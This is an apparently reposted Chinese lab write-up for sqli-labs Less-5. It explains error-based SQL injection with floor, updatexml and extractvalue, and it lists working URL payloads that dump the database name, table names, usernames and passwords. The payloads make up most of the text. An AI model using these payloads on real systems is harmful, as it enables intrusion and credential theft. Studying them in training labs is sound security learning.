标签：union 0x7e labs sqli 第五 select updatexml payload concat

less5

 

更改id后无果，不能用union联合查询

 

 

此处用报错注入

 

报错注入的概念：
(1). 通过floor报错 and (select 1 from (select count(*),concat((
payload),floor (rand(0)*2))x from information_schema.tables group by
x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符
(2). 通过updatexml报错 and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制，其最长输出32位
并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生效

(3). 通过extractValue报错 and extractvalue(1, payload) 输出字符有长度限制，最长32位。

 

?id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

 

 

获取库名：

?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

 

 

爆表名：

?id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --+

 

 

爆用户名：

?id=1' union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+

 

 

爆密码：

?id=1' union select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+

 

标签：union,0x7e,labs,sqli,第五,select,updatexml,payload,concat
来源： https://www.cnblogs.com/messi996/p/14533821.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。